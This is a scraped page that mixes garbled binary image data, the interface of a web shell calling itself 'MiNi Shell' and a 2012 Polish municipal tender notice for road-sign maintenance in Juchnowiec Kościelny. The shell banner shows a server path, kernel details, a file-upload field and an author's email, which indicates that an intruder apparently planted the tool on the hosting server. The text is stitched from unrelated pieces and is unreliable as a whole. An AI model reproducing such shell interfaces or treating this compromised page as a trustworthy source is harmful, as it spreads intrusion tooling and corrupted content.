JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120309/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120309/74250-N-2012.html

<p class="kh_header"><b>Juchnowiec Kościelny: Wykonanie i konserwacja oznakowania pionowego na terenie Gminy Juchnowiec Kościelny w 2012 roku</b><br>
<b>Numer ogłoszenia: 74250 - 2012; data zamieszczenia: 09.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy Juchnowiec Kościelny , ul. Lipowa 10, 16-061 Juchnowiec Kościelny, woj. podlaskie, tel. 085 7132880, faks 085 7132881.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.juchnowiec.gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie i konserwacja oznakowania pionowego na terenie Gminy Juchnowiec Kościelny w 2012 roku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> II. PRZEDMIOTEM ZAMÓWIENIA JEST wykonanie i konserwacja oznakowania pionowego na terenie Gminy Juchnowiec Kościelny w 2012 roku.

Zakres zamówienia obejmuje:
1. Prace objęte bieżącą konserwacją, rozliczane miesięcznym wynagrodzeniem ryczałtowym:
- bieżąca kontrola stanu technicznego znaków; po każdorazowym objeździe należy sporządzić protokół z wykonanych robót konserwacyjnych,
- likwidacja odwróceń i zgięć oznakowania, pochyleń słupków pod znakowych i łańcuchowych, poprawa mocowania,
- mycie elementów licowych oznakowania w celu poprawy widoczności,
- zasłanianie elementów oznakowania pionowego oraz wykonywanie tymczasowych zabezpieczeń, urządzeniami bezpieczeństwa ruchu (tablice wygrodzeniowe, kierujące, taśmy ostrzegawcze), w przypadku okazjonalnych zmian organizacji ruchu (uroczystości państwowe, lokalne święta, itp) -wg potrzeb Zamawiającego,
- odsłanianie widoczności znaków poprzez przycinkę gałęzi drzew,
- prowadzenie książki bieżącej kontroli oznakowania ulic i dróg na terenie Gminy Juchnowiec Kościelny.

Powyższe prace rozliczane będą miesięcznym wynagrodzeniem ryczałtowym brutto.

2. Prace objęte zakresem zamówienia, a wykonywane na podstawie protokołu konieczności, rozliczane cenami jednostkowymi brutto powstałymi po przemnożeniu ceny ofertowej przez podane poniżej wskaźniki:
lp.	Rodzaj prac	wskaźnik
1.	Wykonanie 1 szt. Średniego znaku drogowego na podkładzie stalowym ocynkowanym malowanym na kolor szary; krawędzie gięte z wykorzystaniem folii odblaskowej I generacji - cena ofertowa	1
2. 	Wykonanie 1 szt. średniego znaku drogowego na podkładzie stalowym ocynkowanym malowanym na kolor szary; krawędzie gięte z wykorzystaniem folii odblaskowej II generacji	2,1
3.	Wykonanie 1 szt. dużego znaku drogowego na podkładzie stalowym ocynkowanym malowanym na kolor szary, krawędzie gięte z wykorzystaniem folii odblaskowej I generacji	1,29
4. 	Wykonanie 1 szt. małego znaku drogowego na podkładzie stalowym ocynkowanym malowanym na kolor szary, krawędzie gięte z wykorzystaniem folii odblaskowej I generacji	0,75
5. 	Wykonanie 1 szt. małego znaku drogowego na podkładzie stalowym ocynkowanym malowanym na kolor szary, krawędzie gięte z wykorzystaniem folii odblaskowej II generacji	1,25
6.	Wykonanie 1m2 tabliczki podznakowej o symbolach G,T,U na podkładzie z blachy stalowej ocynkowanej malowanej na kolor szary, krawędzie gięte z wykorzystaniem folii odblaskowej I generacji	2,32
7.	Wykonanie 1m2 tabliczki podznakowej o symbolach G,T,U na podkładzie z blachy stalowej ocynkowanej malowanej na kolor szary, krawędzie gięte z wykorzystaniem folii odblaskowej II generacji	4,40
8.	Wykonanie nietłukącego lustra drogowego O 800	8,50
9.	Montaż 1 szt. znaku drogowego, tabliczki podznakowej, lustra drogowego w sposób trwały, uniemożliwiający obrócenie (np. nitowanie)	0,20
10.	Demontaż 1 szt. znaku drogowego, tabliczki podznakowej, lustra drogowego	0,06
11.	Wykonanie 1 szt. słupka podznakowego z rury stalowej ocynkowanej, o śr. Wys. 3,5m O 60, posiadającego elementy mocujące w gruncie	0,57
12	Wykonanie 1 szt. słupka ogrodzenia łańcuchowego o wys. 1,10m z rur stalowych O 60, warstwa powierzchniowa malowana na kolor biało - czerwony	0,40
13.	Wykonanie 1 szt. słupka ogrodzenia łańcuchowego o wys. 1,10m z rur O 60 (ocynkowanej) malowanej proszkowo z elementami odblaskowymi w kolorze czerwonym	0,70
14.	Wykonanie 1 szt. słupka blokującego o wys. 0,80 m z rur stalowych O 120, warstwa powierzchniowa malowana na kolor biało - czerwony	0,68
15.	Montaż 1 szt. słupka podznakowego, łańcuchowego, blokującego w sposób trwały (betonowanie)	0,20
16.	Demontaż 1 szt. słupka podznakowego, łańcuchowego, blokującego	0,13
17.	Wykonanie łańcucha do ogrodzenia łańcuchowego o dł. 1,5-2,0 m i grubości 6 mm - malowanego na kolor szary	0,10
18.	Wykonanie łańcucha ocynkowanego do ogrodzenia łańcuchowego o dł. 1,5-2,0 m i grubości 4mm	0,10
19.	Montaż łańcucha	0,03
20.	Wykonanie 1m2 tablicy drogowskazowej z konstrukcją symbol E, I generacji	2,55
21.	Wykonanie 1m2 tablicy drogowskazowej z konstrukcją symbol E, II generacji	5,60
22. 	Wykonanie 1m2 tablicy informacyjnej III generacji (fluorescencyjnej)	8,15
23.	Montaż 1m2 tablica informacyjnej III generacji (fluorescencyjnej) 	0,32
24.	Montaż 1m2 tablicy drogowskazowej z konstrukcją symbol E 	0,28
25.	Demontaż 1m2 tablicy drogowskazowej z konstrukcją symbol E	0,28
26.	Wykonanie 1m2 tablicy o symbolu F I generacji (znaki uzupełniające, tablice z nazwami ulic) - wymagania technologiczne jak dla znaków	2,40
27.	Wykonanie 1m2 tablicy o symbolu F II generacji (znaki uzupełniające) - wymagania technologiczne jak dla znaków	4,40
28.	Montaż 1m2 tablicy o symbolu F	0,32
29.	Demontaż 1m2 tablicy o symbolu F	0,20
30.	Malowanie słupka ogrodzenia łańcuchowego wys. 1,10m (na kolor biało-czerwony)	0,09
31.	Malowanie łańcucha	0,04
32. 	Wykonanie ozdobnego słupka wygrodzeniowego	3,80
33.	Wykonanie łańcucha do słupka ozdobnego	0,80
34.	Montaż ozdobnego słupka	0,20
35.	Montaż ozdobnego łańcucha	0,05
36	Elementu progu zwalniającego	1,54
37	Montaż jednego elementu progu zwalniającego	0,29
38	Demontaż jednego elementu progu zwalniającego	0,14

Wykonawca zobowiązany jest wykonać prace stanowiące przedmiot zamówienia zgodnie z obowiązującą Ustawą (Prawo o Ruchu Drogowym) z dn. 20 czerwca 1997r. (Dz.U. Z 2003r. Nr 58 poz. 515) i rozporządzeniem Ministra Infrastruktury z dnia3 lipca 2003r. W sprawie szczegółowych warunków technicznych dla znaków drogowych pionowych i warunki ich umieszczania na drogach (Dz. U. Z 2003r. Nr 220 poz. 2181).

3. Wymagania technologiczne w zakresie trwałości znaków:
Lico winno być wykonane techniką sitodruku. Minimalna grubość podkładu winna wynosić:
- dla znaków z pojedynczego giętą krawędzią-1,25 mm,
- dla znaków z podwójnie giętą krawędzią- 1,0 mm,
4. W okresie trwałości znaku materiały, z których wykonane są tarcze i lico, a także sposób wykończenia znaku muszą wskazywać pełną odporność na oddziaływanie wszelkich czynników atmosferycznych i występujących w normalnych warunkach czynników chemicznych ( w tym korozję elektorchemiczną).
5. Każdy znak musi mieć tabliczkę znamionową określającą: producenta lub dostawcę, datę produkcji (rok, miesiąc), materiał lica znaku, datę ustawienia znaku /rok, miesiąc/; tabliczkę należy wykonać w sposób umożliwiający czytelność znaku przez cały okres jego użytkowania, a materiały użyte do mocowania znaków muszą być wykonane ze stali ocynkowanej.
6. Każdorazowy zakres oraz termin realizacji prac wymienionych w pkt. 1.2. Zamawiający określi protokołem konieczności, sporządzanym po każdorazowym, przeprowadzonym 1 raz w tygodniu wraz z Wykonawcą, objeździe gminy. Do odbioru prac oraz do ich przekazania i objazdu Gminy transport zapewnia Wykonawca.
7. Zamawiający będzie dokonywał prac przy udziale Wykonawcy, w terminie 5 dni roboczych od daty ich zakończenia, określonej w protokole konieczności.
8. Na czas realizacji zamówienia, Wykonawca zapewnia dyspozycyjność firmy na potrzeby Zamawiającego oraz całodzienny stały kontakt telefoniczny w celu umożliwienia przekazywania robót do realizacji (nr tel............................., fax....................... w godz. 7:30 - 15:30 i w godz. 15:30 - 7:30) łącznie z dniami wolnymi od pracy.
9. Zamawiający, przed upływem okresu obowiązywania umowy, dokona ostatecznego odbioru prac.
10. Zdemontowane i zniszczone znaki, słupki itp. Nie nadają się do ponownego wykorzystania, Wykonawca będzie zdawał do punktu złomu, a pieniądze wpłacał na konto, które wskaże zamawiający.
11. Znaki drogowe muszą posiadać Aprobatę Techniczną i Krajowy Certyfikat Zgodności zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 11.08.2004r w sprawie sposobu deklarowania zgodności wyrobów budowlanych oraz sposobu znakowania ich znakiem budowlanym (Dz.U. Nr 198 poz.2041 (system I)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.23.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> XVIII. WYMAGANIA DOTYCZĄCE WADIUM:
Warunkiem udziału w postępowaniu przetargowym jest wniesienie wadium                  w wysokości 1500 zł. Wadium należy wpłacić na konto Zamawiającego: Bank Spółdzielczy w Juchnowcu Górnym Nr 68 8074 0003 0000 1661 2000 0030                w terminie do dnia 20 marca 2012 roku do godziny 1200. Wadium może być również wniesione  w innej formie, zgodnie z ustawą Prawo zamówień publicznych.
Zwrot wadium lub jego utrata na rzecz zamawiającego zgodnie z art.46 ustawy Prawo zamówień publicznych.
Potwierdzenie wniesienia wadium należy dołączyć do złożonej oferty.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający będzie posługiwał się metodą: spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>j.w.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a) Oświadczenie, że wykonawca posiada wiedzę i doświadczenie do wykonania   zamówienia;
    b) aktualny wypis z Krajowego Rejestru Sądowego lub aktualne zaświadczenie z rejestru   działalności gospodarczej, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy Prawo Zamówień Publicznych;
  c) Oświadczenie, że wykonawca dysponuje odpowiednim potencjałem technicznym                  i osobami zdolnymi do wykonania zamówienia;
   d) Wykaz wykonanych w ciągu ostatnich 3 lat przed dniem wszczęcia postępowania tj.  przed datą publikacji ogłoszenia o zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, usług zbliżonych do przedmiotu zamówienia, z podaniem ich wartości, dat wykonania oraz odbiorców. Do wykazu Wykonawca zobowiązany jest dołączyć dokumenty potwierdzające, że usługi te zostały wykonane zgodnie z należytą starannością (referencje itp.). Wykaz zależy sporządzić zgodnie ze wzorem stanowiącym Załącznik Nr 3 do niniejszej SIWZ; 
  e) Oświadczenie, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, (załączyć polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia);
  f) Oświadczenie, że brak jest podstaw do wykluczenia wykonawcy z postępowania                  o udzielenie zamówienia na mocy art. 24 ust. 1 i 2 ustawy Prawo zamówień publicznych,
    g)   Oświadczenie, że wykonawca nie zalega z uiszczaniem podatków lub załączyć aktualne   zaświadczenie z Urzędu Skarbowego; 
 h)   Oświadczenie, że wykonawca nie zalega z uiszczaniem opłat lub składek na  ubezpieczenie społeczne lub zdrowotne lub załączyć aktualne zaświadczenie z ZUS-u; 
   i) wskazanie przez wykonawcę części zamówienia, której wykonanie zamierza  wykonawca powierzyć podwykonawcom - podać nazwę podwykonawcy (zał. nr 4 do SIWZ); załączyć pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia; 
     j)   potwierdzenie wniesienia wadium.
    k) kosztorys ofertowy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - ryczałt miesięczny - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.juchnowiec.gmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Juchnowiec Kościelny ul. Lipowa 10; 16-061 Juchnowiec Kościelny.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.03.2012 godzina 12:00, miejsce: Urząd Gminy Juchnowiec Kościelny ul. Lipowa 10: 16-061 Juchnowiec Kościelny sekretariat, pokój nr 6..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com